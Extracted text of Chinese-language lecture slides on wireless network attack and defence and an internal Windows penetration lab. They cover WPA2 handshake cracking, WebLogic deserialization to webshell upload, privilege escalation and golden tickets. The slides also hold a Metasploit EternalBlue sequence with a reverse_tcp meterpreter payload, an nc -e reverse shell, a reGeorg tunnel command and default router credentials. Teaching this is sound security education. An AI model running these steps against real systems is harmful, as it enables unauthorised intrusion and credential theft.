網絡攻擊與防護 課件 第8、9章 無線網絡攻防技術、內網Windows環(huán)境攻擊實踐

無線網絡攻防技術無線網絡攻防概述無線網絡攻擊無線局域網-WLANWLAN（WirelessLocalAreaNetwork，無線局域網），以無線信道作傳輸媒介的計算機局域網，是有線聯(lián)網方式的重要補充和延伸。廣泛適用于需要可移動數(shù)據處理或無法進行物理傳輸介質布線的領域隨著IEEE802.11無線網絡標準的制定與發(fā)展，使無線網絡技術更加成熟與完善。WLAN產品主要包括：無線接入點、無線網卡、無線路由器、無線網關、無線網橋等無線局域網基本概念無線局域網的傳輸媒質分為無線電波和光波兩類無線電波主要使用無線電波和微波，光波主要使用紅外線無線電波和微波頻率由各個國家的無線電管理部門規(guī)定，分為專用頻段和自由頻段。專用頻段需要經過批準的獨自有償使用的頻段；自由頻段主要是指ISM頻段（Industrical，Scientific，Medical）什么是Wi-Fi？WiFi的全稱是WirelessFidelity，又叫802.11標準，是IEEE定義的一個無線網絡通信的工業(yè)標準該技術使用的使2.4GHz或者5.0GHz附近的頻段802.11b最高帶寬為11Mbps，802.11g最高達54Mbps，802.11n則可達600Mbps其主要特性為：速度快，可靠性高，在開放性區(qū)域，通訊距離可達305米，在封閉性區(qū)域，通訊距離為76米到122米，方便與現(xiàn)有的有線以太網絡整合，組網的成本更低WLAN與Wi-Fi的區(qū)別？Wlan是無線網絡的縮寫，又叫做無線局域網。WIFI是無線網絡中的一個標準，比如說那些IEEE802.11a、b、g、n之類的都屬于WIFI這個標準。802.11標準802.11 1997年IEEE無線局域網標準制定802.11b 2.4GHz直序擴頻傳輸速率1Mbps-11Mbps802.11a 5GHz正交頻分復用傳輸速率6Mbps-54Mbps802.11g 2.4GHz，兼容802.11b，傳輸速率到22Mbps802.1x基于端口的訪問控制協(xié)議（Portbasednetworkaccesscontrolprotocol）802.11i 增強WIFI數(shù)據加密和認證（WPA，RSN）802.11e QoS服務802.11n 更高質量，更高速度，達到以太網性能水平WAPI 國標GB15629.11-2003無線局域網鑒別與保密基礎結構（WAI

WPI）IEEE802.11802.11標準1990年IEEE802標準化委員會成立IEEE802.11無線局域網標準工作組該標準定義物理層和媒體訪問控制(MAC)規(guī)范物理層定義了數(shù)據傳輸?shù)男盘柼卣骱驼{制，工作在2.4000～2.4835GHz頻段IEEE802.11是IEEE最初制定的一個無線局域網標準，主要用于難于布線的環(huán)境或移動環(huán)境中計算機的無線接入，由于傳輸速率最高只能達到2Mbps，所以，業(yè)務主要被用于數(shù)據的存取IEEE802.11a802.11標準1999年，IEEE802.11a標準制定完成，該標準規(guī)定無線局域網工作頻段在5.15～5.825GHz，數(shù)據傳輸速率達到54Mbps/72Mbps(Turbo)，傳輸距離控制在10～100米802.11a采用正交頻分復用（OFDM）的獨特擴頻技術可提供25Mbps的無線ATM接口和10Mbps的以太網無線幀結構接口，以及TDD/TDMA的空中接口支持語音、數(shù)據、圖像業(yè)務；一個扇區(qū)可接入多個用戶，每個用戶可帶多個用戶終端IEEE802.11b802.11標準1999年9月IEEE802.11b被正式批準，該標準規(guī)定無線局域網工作頻段在2.4～2.4835GHz，數(shù)據傳輸速率達到11Mbps該標準是對IEEE802.11的一個補充，采用點對點模式和基本模式兩種運作模式，在數(shù)據傳輸速率方面可以根據實際情況在11Mbps、5.5Mbps、2Mbps、1Mbps的不同速率間自動切換，而且在2Mbps、1Mbps速率時與802.11兼容802.11b使用直接序列（DirectSequence）DSSS作為協(xié)議802.11b和工作在5GHz頻率上的802.11a標準不兼容由于價格低廉，802.11b產品已經被廣泛地投入市場，并在許多實際工作場所運行IEEE802.11e/f/h802.11標準IEEE802.11e標準對無線局域網MAC層協(xié)議提出改進，以支持多媒體傳輸，以支持所有無線局域網無線廣播接口的服務質量保證QoS機制IEEE802.11f，定義訪問節(jié)點之間的通信，支持IEEE802.11的接入點互操作協(xié)議（IAPP）IEEE802.11h用于802.11a的頻譜管理技術IEEE802.11g802.11標準IEEE的802.11g標準是對流行的802.11b（即Wi-Fi標準）的提速（速度從802.11b的11Mb/s提高到54Mb/s）802.11g接入點支持802.11b和802.11g客戶設備。同樣，采用802.11g網卡的筆記本電腦也能訪問現(xiàn)有的802.11b接入點和新的802.11g接入點802.11a的主要缺點是不能和802.11b設備互操作，而且與802.11b相比，802.11a網卡貴50%，接入點貴35%IEEE802.11n802.11標準Wi－Fi聯(lián)盟在802.11a/b/g后面的一個無線傳輸標準協(xié)議可以將WLAN的傳輸速率由目前802.11a及802.11g提供的54Mbps，提高到300Mbps甚至高達600Mbps802.11n標準至2009年才得到IEEE的正式批準，但采用MIMOOFDM技術的廠商已經很多，包括D－Link，Airgo、Bermai、Broadcom以及杰爾系統(tǒng)、Atheros、思科、Intel等等，產品包括無線網卡、無線路由器等，而且已經大量在PC、筆記本電腦中應用無線局域網主要組件無線局域網的主要組件包括無線網卡和接入點。1.無線網卡

無線網卡實際上是一種終端無線網絡設備，它是需要在無線局域網的無線覆蓋下通過無線連接網絡進行上網使用的。2.接入點

接入點的作用相當于局域網集線器，它在無線局域網和有線網絡之間傳輸數(shù)據。接入點通常是通過標準以太網線連接到有線網絡上，并與無線設備進行通信。無線網絡優(yōu)點無線網絡具有下列優(yōu)點：(1)靈活性和移動性(2)安裝便捷(3)易于進行網絡規(guī)劃和調整(4)故障定位容易(5)易于擴展無線網絡缺點無線網絡也具有下列缺點：

(1)性能無線局域網是依靠無線電波進行傳輸?shù)摹?2)速率無線速率是無線網絡的關鍵參數(shù)，它表明了無線設備支持多少帶寬，也就是說能有多少速率來互相連接。

(3)安全性無線網絡容易遭到信息篡改，可以做到無聲無息地對信息進行劫持。無線安全加密方式無線路由器主要提供三種無線安全加密方式，分別為：WEP（WiredEquivalentPrivacy）：WEP算法是一種可選的鏈路層安全機制，用來提供訪問控制，數(shù)據加密和安全性檢驗等。WPA（WiFiProtectedAccess）：WPA是一種保護無線網絡的安全協(xié)議，是一種比WEP強大的加密算法，使用預共享密鑰和臨時密鑰完整性協(xié)議進行加密。WPA2（WiFiProtectedAccess2）：WPA2是基于WPA的一種新的加密方式。WPA2是WPA的升級版，新型的網卡、AP都支持WPA2加密。無線網絡拓撲結構案例北京無線信息共用網RADIUS服務器RadiusServer網管服務器NMSServer計費服務器BillingServer企業(yè)內部網EnterpriseIntranetVPN網關INTERNETorInternationalWirelessISP接入控制器AccessControllor無線接入點AccessPoint無線局域網安全問題無線局域網安全風險

隱患1--信號泄漏信號泄漏未授權訪問敏感數(shù)據竊取一臺被部署在商業(yè)大廈上的無線接入點發(fā)射的信號，最遠傳輸?shù)?個街區(qū)外…隱患2--各種接入認證業(yè)務CMCCChinaNetChinaUnicomCECT-Chinacom…VPN+UDP53=Free?。‰[患3--接入之后的杯具…登錄憑證敏感數(shù)據更多隱私隱患3--接入之后的杯具…SessionHijack--作為中間人參與通信中--監(jiān)聽通信內容，截獲敏感信息--代替某一方，接管會話--篡改正常數(shù)據，插入惡意數(shù)據隱患4--電信家用AP的噩夢隱患4-設備固件可能存在的漏洞口令驗證繞過口令泄漏緩沖區(qū)溢出配置文件下載….隱患5--無線數(shù)據加密破解高強度128位WEP密碼破解長度：128位用時：1分27秒捕獲數(shù)據包：

47872個WPA破解Other…隱患6--無線拒絕服務攻擊點到面的攻擊區(qū)域性空間性基于鏈路層攻擊--Airjack、File2air--Macfld、void11無線網絡安全機制與防護措施通常網絡的安全性主要體現(xiàn)在兩個方面：一是訪問控制，另一個是數(shù)據加密。常見措施：1.對無線網絡進行加密2.設置MAC地址過濾3.使用靜態(tài)IP地址4.改變服務集標識符并且禁止SSID廣播5.采用身份驗證和授權無線網絡攻防概述無線網絡攻擊挖掘隱藏SSID在無線網絡中，AP會定期廣播SSID信息，向外通告無線網絡的存在，無線用戶使用無線網卡發(fā)現(xiàn)無線網絡。為避免無線網絡被非法用戶通過SSID搜索到，可以禁用AP廣播功能，隱藏SSID。但無線網卡連接無線網絡時，需要手動添加SSID才能關聯(lián)成功。SSID可以通過嗅探無線環(huán)境中的數(shù)據包獲取。突破MAC過濾限制無線MAC地址過濾功能，就是允許或禁止指定的MAC地址連接無線網絡，突破MAC地址過濾需要捕獲正常連接的無線客戶端MAC地址，然后更改MAC地址來偽造身份。破解WPA2口令WPA/WPA2目前只能通過字典破解，先抓取連接無線時四次握手過程中的數(shù)據包，然后通過暴力破解的方法破解抓取的握手包。這個數(shù)據包中含有預共享密鑰，所抓取的數(shù)據包必須是認證過程中產生的數(shù)據包。因為WPA增加了身份認證機制，在沒有通過認證的時候，只允許認證信息通過。所以在沒有正確的預共享密鑰的時候，是無法抓取到四步握手過程中的數(shù)據包?？偨Y1、了解無線網絡基本概念2、了解無線網絡體系架構3、

掌握無線網絡優(yōu)缺點4、掌握無線網絡安全機制與防護內網Windows環(huán)境攻擊實踐前言當我們在進行內網滲透中,經常會遇到一些環(huán)境問題,比如拿下的目標機和自身的機器均處于內網之中,這時候想要對目標機內網進行滲透就會遇到一系列的問題。比如我如何用掃描器掃對方的內網?我沒公網IP如何遠程登錄對方內網主機?這些問題如何解決呢？CobaltStrike工具實驗環(huán)境Web網站信息收集Web網站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊CobaltStrike工具CobaltStrike是一款滲透測試工具，CobaltStrike分為客戶端與服務端，服務端是單獨一個，客戶端可以有多個，可用于團隊進行分布式協(xié)同操作。CobaltStrike工具結構團隊服務器創(chuàng)建與連接CobaltStrike用戶接口分為兩部分，接口的頂部是會話或目標的圖形展示，接口的底部展示了每個與之交互的會話標簽頁。用戶接口如下圖所示內網滲透SystemProfiler是一個為客戶端攻擊提供的偵察工具，工具啟動一個本地的Web服務器，并對訪問它的任何應用進行指紋識別。SystemProfiler提供一個它從用戶的瀏覽器里發(fā)現(xiàn)的應用和插件的列表，也會嘗試去發(fā)現(xiàn)代理服務器背后的用戶的內網IP地址。CobaltStrike工具實驗環(huán)境Web網站信息收集Web網站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊實驗環(huán)境過程整個實驗過程大致如下：1) 攻擊者對Web網站進行信息掃描，掃描結果顯示7001端口開放，7001端口默認對應WebLogic服務，存在反序列化遠程命令執(zhí)行漏洞。2) 使用java反序列化終極測試工具上傳木馬到Web網站。3) 通過冰蝎連接Webshell木馬并上傳后門程序。4) 利用MS14-058(即CVE-2014-4113)將會話提權到system權限。5) 將Web網站作為跳板機進行內網滲透。6) 利用CobaltStrike抓取密碼HASH值生成黃金票據，從而獲取域控權限同時能夠訪問域內其他主機的任何服務。CobaltStrike工具實驗環(huán)境Web網站信息收集Web網站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊信息收集途徑公開信息收集存活掃描端口掃描服務識別掃描系統(tǒng)類型識別漏洞掃描

針對口令的掃描

針對特定安全漏洞的掃描深入獲取系統(tǒng)信息信息收集掃描工具－Nmap被稱為是掃描器之王支持多種掃描技術目標和端口設定非常靈活掃描過程根據網絡自動調整端口掃描－Nmap掃描目標端口：Nmap5Nmap–sS5(SYN方式)Nmap–sT5(TCP方式)掃描目標操作系統(tǒng)類型命令：Nmap–O-P05端口掃描－NmapNmap的其他參數(shù)：Nmap–sV5(顯示Banner信息)Nmap–p1-505(指定端口范圍)Nmap–v5(輸出更詳細信息)Nmap–F5(快速模式)Nmap–A5(強化掃描模式)Nmap–oXresult.xml5導出掃描結果到XML文件中Nmap--iflist顯示所有網絡接口--packet-trace跟蹤顯示每一個掃描數(shù)據包ZenmapZenmap——

圖形界面的nmap常見端口號21FTP22SSH23Telnet25SMTP53DNS80HTTP110POP3161SNMP443HTTPS513RLogin1433MSSQLServer1521Oracle3306MySQL3389RDP8080ProxyNessus---綜合漏洞掃描綜合漏掃軟件Nessus

Nessus個人使用可以到官網免費申請序列號

Nessus4.2版開始，不再有獨立的客戶端，而是基于Web來進行管理，一般是這樣的形式：https://[ServerIP]:8834Nessus掃描策略Nessus查看掃描結果口令安全問題口令是很多應用系統(tǒng)認證用戶采用的最廣泛的認證方式，但是口令安全問題，給認證帶來了很多安全隱患口令常見安全問題有如下表現(xiàn)：

弱口令

明文傳輸

默認值口令問題1——弱口令用戶趨向于選擇容易的口令，甚至空口令用戶會選擇易于記住的東西做口令 Test、guest、google、iphone等

名字、生日、簡單數(shù)字等易于選擇該系統(tǒng)的應用 NtServer、oracle等多數(shù)用戶的安全意識薄弱口令問題2——明文傳輸使用明文密碼傳送的應用： FTP、POP、Telnet、HTTP、SNMP、Socks Mountd、Rlogin、NNTP、NFS、 ICQ、IRC、PcAnywhere、VNC等 MSSQL、Oracle等上述服務都容易成為攻擊對象口令問題3——默認值網絡設備 CiscoRouteruser:enablepw:cisco 3Com交換機user:adminpw:synnet TPLink無線路由：user:adminpw:adminModem等等數(shù)據庫 MS-SQL：sa+空口令SNMP Public、Private口令攻擊方式手工猜測

方法：社會工程學、嘗試默認口令自動猜測

工具：John、LC、NTscan等竊聽：登陸、網絡截獲、鍵盤監(jiān)聽

工具：Dsniff、SnifferPro、IKS等NtScan--破解Windows系統(tǒng)口令將生成的字典文件重命名為NT_pass.dic，覆蓋Ntscan目錄下的原字典文件NtScan--破解Windows系統(tǒng)口令運行NtScan，如果目標服務器密碼在字典文件中存在，則會出現(xiàn)如下掃描結果：緩沖區(qū)溢出緩沖區(qū)溢出攻擊原理

緩沖區(qū)溢出攻擊利用編寫不夠嚴謹?shù)某绦?，通過向程序的緩沖區(qū)寫入超過預定長度的數(shù)據，造成緩存的溢出，從而破壞程序的堆棧，導致程序執(zhí)行流程的改變。緩沖區(qū)溢出的危害

最大數(shù)量的漏洞類型。

漏洞危害等級高。國家漏洞庫（CNNVD）漏洞統(tǒng)計緩沖區(qū)溢出基礎-堆棧、指針、寄存器堆棧概念

一段連續(xù)分配的內存空間。堆棧特點

后進先出。

堆棧生長方向與內存地址方向相反。指針

指針是指向內存單元的地址。寄存器

暫存指令、數(shù)據和位址。 ESP（棧頂）、EBP（棧底）、EIP（返回地址）。34H12H78H56H0108HESP棧頂(AL)(AH)34H12H78H56H0106HESP棧頂緩沖區(qū)溢出簡單示例程序作用：將用戶輸入的內容打印在屏幕上。Buffer.c#include<stdio.h>intmain(){

charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}緩沖區(qū)溢出示例用戶輸入內容在8位以內時候，程序正常執(zhí)行用戶輸入內容超過8位以后，程序執(zhí)行產生錯誤緩沖區(qū)溢出簡單示例由于返回地址已經被覆蓋，函數(shù)執(zhí)行返回地址時會將覆蓋內容當作返回地址，然后試圖執(zhí)行相應地址的指令，從而產生錯誤。當我們全部輸入a時，錯誤指令地址為0x616161，0x61是a的ASCII編碼緩沖區(qū)溢出攻擊危害如果可精確控制內存跳轉地址，就可以執(zhí)行指定代碼，獲得權限或破壞系統(tǒng)。尋找程序漏洞編制緩沖區(qū)溢出程序精確控制跳轉地址執(zhí)行設定的代碼獲得系統(tǒng)權限或破壞系統(tǒng)歷史上經典的緩沖區(qū)溢出漏洞Rpc溢出SQLUDP溢出暴風影音2溢出Serv-U溢出漏洞Ms05039Ms06040Ms08067Ms17010（永恒之藍）…緩沖區(qū)漏洞利用-Metasploit平臺介紹溢出攻擊平臺—Metasploit實例—msf攻擊ms-17010漏洞主機1.

searchms17_0102.use

exploit/windows/smb/ms17_010_eternalblue//運行payload3.

setpayloadwindows/x64/meterpreter/reverse_tcp//指定溢出成功后運行的代碼，這里獲取反彈端口的shell4.showoptionsinfo//查看漏洞信息與腳本參數(shù)5.setrhost38//設定攻擊目標IP6.setlhost36//本機IP7.exploit//開始攻擊8.shell//連接溢出成功后打開的shell終端內網滲透場景在我們進行內網滲透中,經常會遇到一些環(huán)境問題,比如拿下的目標機和自身的機器均處于內網之中,這時候想要對目標機內網進行滲透就會遇到一系列的問題.比如我如何用掃描器掃對方的內網?我沒公網IP如何遠程登錄對方內網主機?…端口轉發(fā)端口轉發(fā)這個我們在內網滲透中也是經常遇到，可以使用現(xiàn)成的一些工具或者通過腳本命令進行轉發(fā)常用的轉發(fā)工具：Netcat、Lcx、Htran、FpipeNetcat是大家都很熟悉的一款軟件了，功能十分強大，安全人員必備工具之一。NC使用NC使用：-e參數(shù)，例如：我們將一臺win主機shell反彈到一臺linux主機上，win上執(zhí)行。在linux主機上監(jiān)聽此端口Sock代理Sock代理是一種基于傳輸層的網絡代理協(xié)議,不同于VPN,Sock代理只能對使用該代理協(xié)議的程序生效,因此,可以說它是一種局部代理,而不是像VPN一樣的全局代理，速度也弱于VPN。但在我們滲透測試中，需要盡量對目標機制造出盡可能小的影響，因此，sock代理也經常會被用到。Sock代理場景攻擊端和內網主機處于同一網絡環(huán)境下，或者攻擊端具有公網IP，因為在服務器端運行sock腳本時會需要尋址到客戶端。下面拓撲情況為攻擊端無法直接訪問內網主機：socks5代理（reGeorg+proxifier）reGeorgreGeorg是reDuh的繼承者，利用了會話層的socks5協(xié)議，效率更高。proxifierProxifier是一款功能非常強大的socks5客戶端，可以讓不支持通過代理服務器工作的網絡程序能通過HTTPS或SOCKS代理或代理鏈。工具配置工具配置先將reGeorg的對應腳本上傳到服務器端，直接訪問顯示“Georgsays,'Allseemsfine'”，表示腳本運行正常工具配置運行py程序：

python

reGeorgSocksProxy.py

-p

8888

-u

http:

///test/tunnel.jsp工具配置將proxifier打開，在ProxyServer中這樣配置工具配置在遠程桌面程序上右鍵，以Proxifier選擇“ProxySOCKS5”打開。ipconfig查詢內網機器的ipCobaltStrike工具實驗環(huán)境Web網站信息收集Web網站漏洞利用利用CobaltStrike獲取Shell會話域環(huán)境信息收集域主機攻擊WeblogicScan掃描漏洞漏洞檢測結果打開終端，輸入命令cd/home/WeblogicScan，切換到WeblogicScan目錄，輸入命令python3WeblogicScan.py07001，掃描結果顯示存在CVE-2019-2725漏洞。WeblogicScan掃描漏洞反序列化漏洞在攻擊主機的瀏覽器地址欄中輸入0:7001/_async/AsyncResponseService，測試漏洞是否存在。利用Java反序列化終極測試工具上傳木馬使用Java反序列化終極測試工具上傳木馬到目標主機，目標服務器選擇Weblogic，目標輸入0:7001/，單擊獲取信息按鈕，回顯目標主機相關信息。反序列化終極測試工具利用冰蝎連接木馬單擊Webshell上傳標簽，上傳冰蝎木馬文件Webshell上傳CobaltStrike工具實驗環(huán)境Web網站信息收集Web網站漏洞利用利用C